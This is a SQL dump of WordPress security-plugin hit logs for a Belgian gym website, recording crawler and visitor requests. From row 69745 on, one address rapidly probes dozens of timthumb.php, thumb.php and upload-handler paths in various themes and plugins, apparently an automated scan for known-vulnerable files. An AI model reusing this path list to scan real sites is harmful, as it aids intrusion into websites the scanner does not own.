(69697, 1492484848.695513, 2760155472, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69698, 1492486495.630021, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69699, 1492486495.659232, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69700, 1492486496.117246, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69701, 1492486586.898832, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69702, 1492486588.420225, 1570674758, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69703, 1492489334.260030, 1137333282, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69704, 1492494166.616685, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69705, 1492505140.467176, 3024883590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69706, 1492510439.817422, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69707, 1492511625.240552, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69708, 1492512325.955946, 2680901981, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '213.186.33.3', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(69709, 1492514663.196246, 1405506603, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/88.0.0.60.70;FBBV/55239788;FBDV/iPhone8,2;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/3;FBCR/OrangeFrance;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/55239788]'),
(69710, 1492516187.015025, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69711, 1492516374.222127, 3576798088, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0'),
(69712, 1492516375.160855, 3576798088, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0'),
(69713, 1492520467.480268, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69714, 1492521349.239674, 1123631302, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(69715, 1492522528.117511, 2509961625, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(69716, 1492525721.800792, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69717, 1492528825.738496, 3223591686, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crossfitvictoria.com/', 'Opera/9.80 (J2ME/MIDP  Opera Mini/4.0.10031/24.743  U  ru) Presto/2.5.25 Version/10.54'),
(69718, 1492528829.349187, 3223591686, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Opera/9.80 (J2ME/MIDP  Opera Mini/4.0.10031/24.743  U  ru) Presto/2.5.25 Version/10.54'),
(69719, 1492533334.673565, 3475901770, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69720, 1492538480.117815, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69721, 1492540393.320055, 1375157742, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-E500H Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69722, 1492540955.327137, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69723, 1492540957.354364, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69724, 1492540958.830169, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69725, 1492540959.246290, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69726, 1492540959.713541, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69727, 1492540960.112090, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69728, 1492540960.537307, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69729, 1492540966.532502, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69730, 1492540966.969140, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69731, 1492540967.363658, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69732, 1492541303.887356, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69733, 1492541304.403696, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69734, 1492541304.861306, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69735, 1492541305.323484, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69736, 1492542753.292630, 3512707053, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(69737, 1492543785.814189, 1834526946, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69738, 1492543812.871543, 1834526946, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69739, 1492545498.198934, 3423455627, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)'),
(69740, 1492545797.555905, 2990433199, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)'),
(69741, 1492546708.042557, 1334242039, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'),
(69742, 1492546818.219294, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69743, 1492561948.112110, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69744, 1492562786.663647, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69745, 1492566349.105053, 856636214, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69746, 1492566349.681839, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-mobile-detector/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69747, 1492566349.682891, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/diamond-ray/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69748, 1492566349.683993, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/brochure-melbourne/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69749, 1492566349.774133, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69750, 1492566350.146452, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/Transcript/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69751, 1492566350.179522, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/pearlie/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69752, 1492566350.208932, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69753, 1492566350.373367, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/delight/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69754, 1492566350.662579, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/a-gallery/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69755, 1492566350.674854, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/thrillingtheme/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69756, 1492566350.885129, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/optimize/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69757, 1492566351.059509, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/dandelion_v2.6.4/functions/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69758, 1492566351.138199, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/mymag/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69759, 1492566351.203277, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/swift/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69760, 1492566351.414073, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/suffusion/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69761, 1492566351.483773, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/DeepBlue/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69762, 1492566351.614487, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/DelicateNews/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69763, 1492566351.849682, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/ElegantEstate/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69764, 1492566351.913825, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/myjourney_3.1/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69765, 1492566351.954838, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/redlight/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69766, 1492566352.114766, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/gunungkidul/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69767, 1492566352.225781, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/neofresh/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69768, 1492566352.361732, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/seo-image-galleries/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69769, 1492566352.503148, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/sugar-slider/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69770, 1492566352.583530, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/cruz/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69771, 1492566352.610052, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/typebased/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69772, 1492566352.843769, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/simplewhite/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69773, 1492566352.944677, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/constructor/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69774, 1492566353.003415, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/deliciousmagazine/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69775, 1492566353.021978, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/myjourney/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69776, 1492566353.398066, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/download-manager/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69777, 1492566353.404781, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69778, 1492566353.456023, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/SimplePress/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69779, 1492566353.473754, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/meenews-newsletter/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69780, 1492566353.770860, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Premium_Gallery_Manager/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69781, 1492566353.771417, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/eNews/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69782, 1492566353.932841, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/snowblind/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69783, 1492566353.979723, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/wp-clear-prem/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69784, 1492566354.132996, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/make-money-online-theme-1/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69785, 1492566354.151783, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/a-supercms/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69786, 1492566354.464931, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/squeezepage/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69787, 1492566354.487734, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/Nova/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69788, 1492566354.526744, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/granite-lite/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69789, 1492566354.548485, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/introvert/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69790, 1492566354.939765, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cms-pack/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69791, 1492566355.138631, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/comet/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69792, 1492566355.162513, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/verve-meta-boxes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69793, 1492566355.174101, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/modularity2/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69794, 1492566355.331427, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/InterPhase/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69795, 1492566355.672080, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/tribune/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69796, 1492566355.730236, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/epione/script/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69797, 1492566355.733910, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wordpress-gallery-plugin/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69798, 1492566355.809098, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/constructor/libs/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69799, 1492566356.095047, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/smart-related-posts-thumbnails/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69800, 1492566356.103297, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/Memoir/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69801, 1492566356.107376, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/constructor/layouts/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69802, 1492566356.269437, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/retreat/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69803, 1492566356.608982, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/aio-shortcodes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69804, 1492566356.610573, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/skeptical/thumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69805, 1492566356.611580, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/multidesign/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69806, 1492566356.717779, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wordpress-thumbnail-slider/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69807, 1492566357.005147, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69808, 1492566357.012530, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/brightsky/scripts/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
(69809, 1492566357.012962, 856636214, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/modularity/includes/timthumb.php', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36'),
